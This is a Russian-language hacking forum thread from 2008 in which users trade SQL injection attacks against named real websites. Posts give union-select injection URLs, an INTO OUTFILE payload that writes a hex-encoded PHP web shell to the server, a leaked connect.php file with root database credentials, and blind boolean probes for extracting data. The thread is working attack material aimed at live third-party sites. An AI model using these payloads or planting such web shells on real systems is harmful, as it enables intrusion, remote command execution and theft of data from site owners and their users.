08.08.2008, 17:25
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами:
9741777
Репутация:
100
|
|
Возможно стоит блок по ай-пи. То есть в админку может заходить только с ай-пи 75.125.150.120 - к примеру.
|
|
|
09.08.2008, 00:50
|
|
Постоянный
Регистрация: 15.06.2008
Сообщений: 941
С нами:
9423746
Репутация:
2399
|
|
xWhitex: ну или (так как у меня с alvis.ru било) просто вход в админку иногда вирубивають =(
|
|
|
|
09.08.2008, 00:56
|
|
Участник форума
Регистрация: 24.06.2007
Сообщений: 299
С нами:
9937288
Репутация:
212
|
|
Собствено что можно зделать?
Эмм, ну вобщето ты получил пасс от самой базы данных, а не пасс от админки 
|
|
|
|
09.08.2008, 03:07
|
|
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
С нами:
9483229
Репутация:
1160
|
|
Здрастье =)
у меня вопрос:
http://www.pixheaven.net/galerie_us.php?id=-3+union
+select+1,2,3,4,5,6,7,8,9/*
Вот скуля,принтабельное поле - 7
http://www.pixheaven.net/galerie_us.php?id=-3+union+select+1,2,3,4,5,6,version(),8,9/*
J\Очень интересно выводиться версия,можно ли вывести данные кроме version()???
Заранее спасибо |
|
|
|
09.08.2008, 03:36
|
|
Новичок
Регистрация: 24.07.2008
Сообщений: 29
С нами:
9367310
Репутация:
52
|
|
Сообщение от DDoSька
Здрастье =)
у меня вопрос:
+select+1,2,3,4,5,6,7,8,9/*
Вот скуля,принтабельное поле - 7
J\Очень интересно выводиться версия,можно ли вывести данные кроме version()???
Заранее спасибо скорее всего нет,я думаю,там стоит ограничение по типу данных и по длине...
а у меня такой вопрос:
почему не проходит конструкция ?
http://www.disasterinfo.mn/forum/answer_input.php?id=12+union+select+1,0x3c3f2073797374656d28245f4745545b27636d64275d293b 203f3e,3,4,5+from+main_data2.admin+into+outfile+0x2f7661722f7777772f666f72756d2f7368656c6c2e706870/*
0x3c3f2073797374656d28245f4745545b27636d64275d293b 203f3e - <? system($_GET['cmd']); ?>
0x2f7661722f7777772f666f72756d2f7368656c6c2e706870 - установочная дирректория /var/www/forum/shell.php
|
|
|
|
09.08.2008, 03:46
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
С нами:
10892546
Репутация:
2274
|
|
В Into Outfile нельзя использовать Hex значения, только коквычки
Гы гы, connect.php
Код:
<?
$Host = "localhost";
$User = "root";
$Password = "123456";
$Database_name = "forum";
$Link = mysql_connect ($Host, $User, $Password) or die(mysql_error());
mysql_select_db($Database_name,$Link) or die(mysql_error());
?>
Мощный пароль на рута 
Последний раз редактировалось Ponchik; 09.08.2008 в 04:00..
|
|
|
|
09.08.2008, 03:57
|
|
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
С нами:
9949072
Репутация:
237
|
|
Код:
http://www.pixheaven.net/galerie.php?id=-5+union+select+1,2,3,4,5,6,version(),8,9+from+mysql.users/*
повидимому вслепую видно что ето версия 4.1.x
да и
Код:
SELECT command denied to user 'pixheavennet'@'10.0.85.212' for table 'users
нет доступа на чтение.. |
|
|
|
09.08.2008, 05:10
|
|
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
С нами:
9483229
Репутация:
1160
|
|
Сообщение от K1nD[e]R
Код:
http://www.pixheaven.net/galerie.php?id=-5+union+select+1,2,3,4,5,6,version(),8,9+from+mysql.users/*
повидимому вслепую видно что ето версия 4.1.x
да и
Код:
SELECT command denied to user 'pixheavennet'@'10.0.85.212' for table 'users
нет доступа на чтение.. Почему же четвертая? Если выводиться,что пятая?
http://www.pixheaven.net/galerie_us.php?id=-3+union+select+1,2,3,4,5,6,7,8,9/*
Увидишь,что принтабельно поле 7,а когда вводишь version() ,то активируется\загарается цифра ПЯДЬ 
|
|
|
|
09.08.2008, 22:01
|
|
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
С нами:
9949072
Репутация:
237
|
|
Сообщение от DDoSька
Почему же четвертая? Если выводиться,что пятая?
Увидишь,что принтабельно поле 7,а когда вводишь version() ,то активируется\загарается цифра ПЯДЬ а ты введи вместо (7) цифру 3 и увидиш загоритсо цифра 3...
|
|
|
|
09.08.2008, 22:33
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
K1nD[e]R,DDoSька
Версия 5 полей с выводом нет(в этом месте), цифра которая выводится(активируется) это не вывод, но её можно использовать как индикацию true
Тоесть:
http://www.pixheaven.net/galerie_us.php?id=3+and+substring(version(),1,1)=3
цифра не активна false
http://www.pixheaven.net/galerie_us.php?id=3+and+substring(version(),1,1)=4
цифра не активна false
http://www.pixheaven.net/galerie_us.php?id=3+and+substring(version(),1,1)=5
цифра зажглась true
Или ищи вывод в другом месте, или подзапросы
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для K1nD[e]R](/avatars/avatar37752.jpg?808362){kind=avatar}
![Аватар для K1nD[e]R](/avatars/avatar37752.jpg?809292){kind=avatar}
Похожие темы
Комбинированный вид
